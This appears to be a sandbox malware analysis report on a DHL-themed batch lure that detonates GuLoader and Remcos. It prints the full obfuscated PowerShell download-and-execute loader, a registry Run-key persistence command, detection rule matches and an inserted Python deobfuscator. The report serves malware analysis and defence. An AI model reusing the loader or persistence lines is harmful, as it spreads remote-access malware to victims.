
Windows Analysis Report
awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat

Overview

General Information

Sample name: awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat
Analysis ID: 1632026
MD5: edaf8ad7fe020745bceed3c4baad35b3
SHA1: 2f1242d44c9b11fbe8b20e8023cbcfacbb6b044f
SHA256: 45568e9d3eb6f833b3b36b9061d04f94f342f05a2c8fe4f8839b38e5633b9230
Tags: bat, DHL, user-abuse_ch

Detection

GuLoader, Remcos
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7304 cmdline: powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. 
Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePantaaparasdBritaeNerirrUopfosSl to[B,llf$Eme,rTPr duaWie.ewnadka]Trave=Besty$ Sta HNyerho ChacrKoreoeA.oindo.thoe');$Fritnkeris=Slappelse199 'Afgrs$StavnRCyprieHaandv nlumiFejlksMohocoGoelirD.vleyE,eut.UnikuD MeldoCer.iw Ca un ksplBeda.ouns aahyp rdTolv F AndriCemenlFormueTunes( diak$BagudAMe,nukSo.tbt NoncrSkrmbieuropcBehoveForudn PrepsPriva,Duge $BalkaBHaan,eB.kseh riseJeronlNonvidRamar)';$Beheld=$Plumbums;Haggardly (Slappelse199 ' Ra z$Bred,GPancrLDuu vovge nb NecrADea oLGuiro:CigarHRuskrO resL LyceeUgelnt TnucHPrimanDiploiMetalCUnfle= Fjer(De.eitLoselE ap.eSOversTRests-Perc ppermiaOmlastKaffehVioli Perso$ SoftbUdvanePhysiHO dreeRosmaLIri rdCrims)');while (!$Holethnic) {Haggardly (Slappelse199 'Udsky$LatrigFrontlVejtroBarmsbApp.aaDeltrlPortv:R.kurmU.preiFunkts 
EdnrwQatarrJuguliSautetforw,emisen=Tsemi$BrandS SubstDrnlerOutblmDesenpU,drae Go.sfhf etdPattodM,thoeSiccer FarvnSkryde') ;Haggardly $Fritnkeris;Haggardly (Slappelse199 '.jlsa[CephaTGangrHPantorBestiENeskhASuperdUnmasIVaaben RimagMabeo.JagenTFlaskHRejseRDjvleERtes.AProdudK.nte]afsla:Blted:Get wSUnderLSh,ntEExceneP rilpKunst(Ef.er4Hallc0Stenb0Kujon0 nwit)');Haggardly (Slappelse199 'Ramus$Und cGskandlPsychoBrostBUdenrAKo celSourb: hel hPeroroRespoLAan sE MarmTBesj.H UdsknPul oIBlgetcPakpr=Lintw(Kugelt TilsEI tersIslndTVente-klausPBiss aRubiaTUnscrh rot mili.$ThermbLoselEPrelaHSabicESportLPapegdDreed)') ;Haggardly (Slappelse199 'Skvat$fa ligDigtelWahhaOF jlsBM ljbARheumLResus:SaddeRHel oESolfaD VideRskruteBetersmedioSNaglee aaskrLetteI Monon eterg SlukS Svrd= Jud $tantrGCruncLredniO SquiBAfslaA Storl S bc:Dus oD Old aLagerL amaECo reTtr nbHEmbaysSmugl+Sk.re+ Haar%Start$Yeas sRol beScopiRUdtmtv mciniUn.lbcUd,ifEraggeP La.kR IndkIQuipssAzot,ExanthrFacitN FuseE Aka.sNomin.Pre ic KorsO,ootyuAsyllNPanchT') ;$Aktricens=$Serviceprisernes[$Redresserings]}$Hedvinene143=304093;$Mouldings=32673;Haggardly (Slappelse199 'Tykst$Exoerg NevaL Rusto iogabBes.ea Polel Resp:.osegeCompafMonocT BlueeDiscorF queBKo derElskoNBandiD NodeI ProlN RuthGOx.chE.rossnS.ive Pre e=Lan.e DrttegC amoe entvTNupti-RacencRustboPostdn sa aTK rkeeFredsNVandrt utun Penul$unforbUndese CaveHFarveeHonniltolypd');Haggardly (Slappelse199 'Barb $,ndlagKlad lEner o appebMatriahullalMater:LandbF,agloiDefunnBekrfhLileseAngordClibaear dur Sa.cnPharyeC.nsu Icht =D lir Succi[SprriSSolaryprot sAnfeetEtatseTa samResed.KometCchrysoo erwnpeitev HoiceLil erDekodtUrosc]A sci:Udsty: elcFGripprQuailoLa.temBilleBRowa aUgemas MisbeEpigr6Podia4ReaffS.repet Menir.iureiJocosnUndergProan(Z nin$DokmaETjrm fOmn vtExtraeSolmorStangb fre.rfl tsnDors dPro aiInspin PotwgFalane DribnHooey)');Haggardly (Slappelse199 'Le,va$ App GWaf ilSemi,O TranbBimilAN nsel Re i:MegohrMilieeLo deKDolmeuSchmaR LatiSmodemE PlatR.lagnNFjerneforepsT.ilo 
Baand= Fros St re[a fons Ju iY TrelSLydbaTSlideeSwellmLanga.ClearTpu dlE angexLoeinTSag r.A.etre SpirN .ortcGym rOLivsmdSt rsiTvangN OuveGLitre]Steto:Arkit:PeramaSvanfsdy,ekCInadaiNeuroiFlles.UnshoGOr,hieDrvtyt SateS,ephaTDisklrr.nskiR painVi ilGantip(Prale$EudaeFtapasiTo,nenFissih,eleieThereD,kureEDuettReng,nNHypodEInor )');Haggardly (Slappelse199 ' Rust$AppargNonshl,eomeORdmenbUdf,iA aluLDybs.:DevenTUgrssOLftedT efugeNonreMTayiriSignesStachTLeucosAstel=Frste$EarloR Natuem norKUforsUB.estRParads MinkETegnir.ntennSw,ngeRevolSSt ve.Da elS hostUMenisb optis DotttFro sRAnkl,iH.lvsNPhocog An.t( Smrr$Airmoh RkneETripidOrdboVUnfl,iR.ilrnBankyeFilann rnsvE Daug1 H.li4Demi.3antar,A gum$ ersoMTubenoSnittuAmin,LNuppedPinnuI paltN oquiGAnskuS pant)');Haggardly $totemists;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8052 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. 
Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePantaaparasdBritaeNerirrUopfosSl to[B,llf$Eme,rTPr duaWie.ewnadka]Trave=Besty$ Sta HNyerho ChacrKoreoeA.oindo.thoe');$Fritnkeris=Slappelse199 'Afgrs$StavnRCyprieHaandv nlumiFejlksMohocoGoelirD.vleyE,eut.UnikuD MeldoCer.iw Ca un ksplBeda.ouns aahyp rdTolv F AndriCemenlFormueTunes( diak$BagudAMe,nukSo.tbt NoncrSkrmbieuropcBehoveForudn PrepsPriva,Duge $BalkaBHaan,eB.kseh riseJeronlNonvidRamar)';$Beheld=$Plumbums;Haggardly (Slappelse199 ' Ra z$Bred,GPancrLDuu vovge nb NecrADea oLGuiro:CigarHRuskrO resL LyceeUgelnt TnucHPrimanDiploiMetalCUnfle= Fjer(De.eitLoselE ap.eSOversTRests-Perc ppermiaOmlastKaffehVioli Perso$ SoftbUdvanePhysiHO dreeRosmaLIri rdCrims)');while (!$Holethnic) {Haggardly (Slappelse199 'Udsky$LatrigFrontlVejtroBarmsbApp.aaDeltrlPortv:R.kurmU.preiFunkts 
EdnrwQatarrJuguliSautetforw,emisen=Tsemi$BrandS SubstDrnlerOutblmDesenpU,drae Go.sfhf etdPattodM,thoeSiccer FarvnSkryde') ;Haggardly $Fritnkeris;Haggardly (Slappelse199 '.jlsa[CephaTGangrHPantorBestiENeskhASuperdUnmasIVaaben RimagMabeo.JagenTFlaskHRejseRDjvleERtes.AProdudK.nte]afsla:Blted:Get wSUnderLSh,ntEExceneP rilpKunst(Ef.er4Hallc0Stenb0Kujon0 nwit)');Haggardly (Slappelse199 'Ramus$Und cGskandlPsychoBrostBUdenrAKo celSourb: hel hPeroroRespoLAan sE MarmTBesj.H UdsknPul oIBlgetcPakpr=Lintw(Kugelt TilsEI tersIslndTVente-klausPBiss aRubiaTUnscrh rot mili.$ThermbLoselEPrelaHSabicESportLPapegdDreed)') ;Haggardly (Slappelse199 'Skvat$fa ligDigtelWahhaOF jlsBM ljbARheumLResus:SaddeRHel oESolfaD VideRskruteBetersmedioSNaglee aaskrLetteI Monon eterg SlukS Svrd= Jud $tantrGCruncLredniO SquiBAfslaA Storl S bc:Dus oD Old aLagerL amaECo reTtr nbHEmbaysSmugl+Sk.re+ Haar%Start$Yeas sRol beScopiRUdtmtv mciniUn.lbcUd,ifEraggeP La.kR IndkIQuipssAzot,ExanthrFacitN FuseE Aka.sNomin.Pre ic KorsO,ootyuAsyllNPanchT') ;$Aktricens=$Serviceprisernes[$Redresserings]}$Hedvinene143=304093;$Mouldings=32673;Haggardly (Slappelse199 'Tykst$Exoerg NevaL Rusto iogabBes.ea Polel Resp:.osegeCompafMonocT BlueeDiscorF queBKo derElskoNBandiD NodeI ProlN RuthGOx.chE.rossnS.ive Pre e=Lan.e DrttegC amoe entvTNupti-RacencRustboPostdn sa aTK rkeeFredsNVandrt utun Penul$unforbUndese CaveHFarveeHonniltolypd');Haggardly (Slappelse199 'Barb $,ndlagKlad lEner o appebMatriahullalMater:LandbF,agloiDefunnBekrfhLileseAngordClibaear dur Sa.cnPharyeC.nsu Icht =D lir Succi[SprriSSolaryprot sAnfeetEtatseTa samResed.KometCchrysoo erwnpeitev HoiceLil erDekodtUrosc]A sci:Udsty: elcFGripprQuailoLa.temBilleBRowa aUgemas MisbeEpigr6Podia4ReaffS.repet Menir.iureiJocosnUndergProan(Z nin$DokmaETjrm fOmn vtExtraeSolmorStangb fre.rfl tsnDors dPro aiInspin PotwgFalane DribnHooey)');Haggardly (Slappelse199 'Le,va$ App GWaf ilSemi,O TranbBimilAN nsel Re i:MegohrMilieeLo deKDolmeuSchmaR LatiSmodemE PlatR.lagnNFjerneforepsT.ilo 
Baand= Fros St re[a fons Ju iY TrelSLydbaTSlideeSwellmLanga.ClearTpu dlE angexLoeinTSag r.A.etre SpirN .ortcGym rOLivsmdSt rsiTvangN OuveGLitre]Steto:Arkit:PeramaSvanfsdy,ekCInadaiNeuroiFlles.UnshoGOr,hieDrvtyt SateS,ephaTDisklrr.nskiR painVi ilGantip(Prale$EudaeFtapasiTo,nenFissih,eleieThereD,kureEDuettReng,nNHypodEInor )');Haggardly (Slappelse199 ' Rust$AppargNonshl,eomeORdmenbUdf,iA aluLDybs.:DevenTUgrssOLftedT efugeNonreMTayiriSignesStachTLeucosAstel=Frste$EarloR Natuem norKUforsUB.estRParads MinkETegnir.ntennSw,ngeRevolSSt ve.Da elS hostUMenisb optis DotttFro sRAnkl,iH.lvsNPhocog An.t( Smrr$Airmoh RkneETripidOrdboVUnfl,iR.ilrnBankyeFilann rnsvE Daug1 H.li4Demi.3antar,A gum$ ersoMTubenoSnittuAmin,LNuppedPinnuI paltN oquiGAnskuS pant)');Haggardly $totemists;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7256 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 1372 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
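The powershell.exe command lines in the tree above are built from two helpers. `Slappelse199` walks a string literal from index 5 in steps of 6 and keeps only those characters, so every real character is padded with five filler characters (Danish-looking word fragments). `Haggardly` is `.($Remittable) (...)`, which dot-sources whatever command `$Remittable` names; `$Remittable` decodes to `ieX`, so each `Haggardly (Slappelse199 '...')` is an Invoke-Expression of one decoded fragment. The Python below is an added deobfuscator written for this note; it is not part of the Joe Sandbox report or of the sample. The literals embedded in it are copied from the process tree above, and the values they decode to (`neT.WebclieNt`, `Tls12`, `UsEr-AGeNt`, `Mozilla/`, `$GLObAL:plumBumS=$Env:AppDATa+$mooS`) line up with the Firefox User-Agent seen in the GET requests further down and with `$Moos='\preconversion.Pri'` as a drop path under %APPDATA%. One caveat for anyone decoding from this page rather than from the original .bat: the report rendering has stripped non-ASCII filler characters from some of the longer literals, which shifts the stride and yields garbage from that point on. `is_well_formed` flags such literals, because a generator that emits five filler characters per real character always produces a length divisible by six.

```python
import re
from typing import Dict, List

# Slappelse199 in the sample:
#   $i = 5; do { $out += $s[$i]; $i += 6 } until (!$s[$i]); $out
# i.e. every sixth character starting at offset 5 is real, the other five are filler.
OFFSET, STRIDE = 5, 6


def decode(padded: str) -> str:
    """Strip the filler exactly as Slappelse199 does."""
    return padded[OFFSET::STRIDE]


def is_well_formed(padded: str) -> bool:
    """True when the literal still has its full 5-filler-per-character layout.

    Literals copied from this report page may have lost non-ASCII filler
    characters; their length is then no longer a multiple of STRIDE and the
    decoded text is wrong from the first dropped character onwards.
    """
    return len(padded) > 0 and len(padded) % STRIDE == 0


# PowerShell single-quoted literals have no backslash escapes; '' is an escaped quote.
LITERAL_RE = re.compile(r"Slappelse199\s+'((?:[^']|'')*)'")
ASSIGN_RE = re.compile(r"\$(\w+)\s*(\+?=)\s*Slappelse199\s+'((?:[^']|'')*)'")


def decode_literals(script: str) -> List[str]:
    """Every Slappelse199 '...' literal in the script, decoded, in source order."""
    return [decode(m.group(1).replace("''", "'")) for m in LITERAL_RE.finditer(script)]


def decode_assignments(script: str) -> Dict[str, str]:
    """Map $var = / $var += Slappelse199 '...' chains to their decoded values.

    Following += is what reassembles strings the author split on purpose,
    such as $Gildhall ('neT.W' + 'ebclieNt').
    """
    values: Dict[str, str] = {}
    for name, op, lit in ASSIGN_RE.findall(script):
        piece = decode(lit.replace("''", "'"))
        values[name] = values.get(name, "") + piece if op == "+=" else piece
    return values


# Constructed input: literals copied verbatim from the PID 7304 command line above.
# Only literals that survived the report rendering intact (length % 6 == 0) are used.
SAMPLE = (
    "$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';"
    "$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';"
    "$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';"
    "$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';"
    "$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';"
    "$dipolen=Slappelse199 'Aliqu>';"
    "$Remittable=Slappelse199 'Enjoii uncoePomolX';"
    "Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru "
    "BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aD"
    "AuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');"
)


if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE).items():
        print(f"${name} = {value!r}")
    for literal in decode_literals(SAMPLE):
        print("iex ->", literal)
```

For a real sample, read the .bat as text without dropping non-ASCII characters and hand the whole script body to `decode_literals` or `decode_assignments`; the PowerShell `$Remittable` variable (here `ieX`) is the one to resolve first, since every other decoded fragment is executed through it.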
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\hsGaonspt.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000E.00000002.2499274880.00000000054F3000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000A.00000002.1988703799.000000000A323000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 7304 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 7304 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Matched strings:
  • 0x2a18f4: $b2: ::FromBase64String(
  • 0xe9a18: $s1: -join
  • 0x156059: $s1: -join
  • 0x16312e: $s1: -join
  • 0x166500: $s1: -join
  • 0x166bb2: $s1: -join
  • 0x1686a3: $s1: -join
  • 0x16a8a9: $s1: -join
  • 0x16b0d0: $s1: -join
  • 0x16b940: $s1: -join
  • 0x16c07b: $s1: -join
  • 0x16c0ad: $s1: -join
  • 0x16c0f5: $s1: -join
  • 0x16c114: $s1: -join
  • 0x16c964: $s1: -join
  • 0x16cae0: $s1: -join
  • 0x16cb58: $s1: -join
  • 0x16cbeb: $s1: -join
  • 0x16ce51: $s1: -join
  • 0x16efe7: $s1: -join
  • 0x17da31: $s1: -join
(3 further entries are not shown in the report)

Source | Rule | Description | Author
amsi64_7304.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_8052.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Matched strings:
  • 0xa998: $b2: ::FromBase64String(
  • 0x9a5a: $s1: -join
  • 0x3206: $s4: +=
  • 0x32c8: $s4: +=
  • 0x74ef: $s4: +=
  • 0x960c: $s4: +=
  • 0x98f6: $s4: +=
  • 0x9a3c: $s4: +=
  • 0x1430c: $s4: +=
  • 0x1438c: $s4: +=
  • 0x14452: $s4: +=
  • 0x144d2: $s4: +=
  • 0x146a8: $s4: +=
  • 0x1472c: $s4: +=
  • 0xa23e: $e4: Get-WmiObject
  • 0xa42d: $e4: Get-Process
  • 0xa485: $e4: Start-Process
  • 0x14f8d: $e4: Get-Process

              System Summary

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1372, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Afbenyt
